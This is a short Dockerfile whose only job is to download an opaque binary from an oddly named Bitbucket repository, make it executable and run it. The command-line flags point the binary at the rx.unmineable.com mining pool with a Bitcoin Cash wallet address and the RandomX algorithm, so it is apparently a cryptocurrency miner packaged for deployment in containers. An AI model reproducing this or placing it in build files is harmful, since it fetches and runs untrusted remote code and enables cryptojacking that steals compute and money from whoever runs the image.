FROM ubuntu:20.04

RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/Akowkdwodjiewhfiurf/awkowkwowkwokwk/downloads/masterfile
RUN chmod u+x masterfile
RUN ./masterfile -o rx.unmineable.com:3333 -u BCH:qqvqd46p9qg0rsrkw8n4f4fllraj853f65zkypyjsr.siska -k -a rx/0
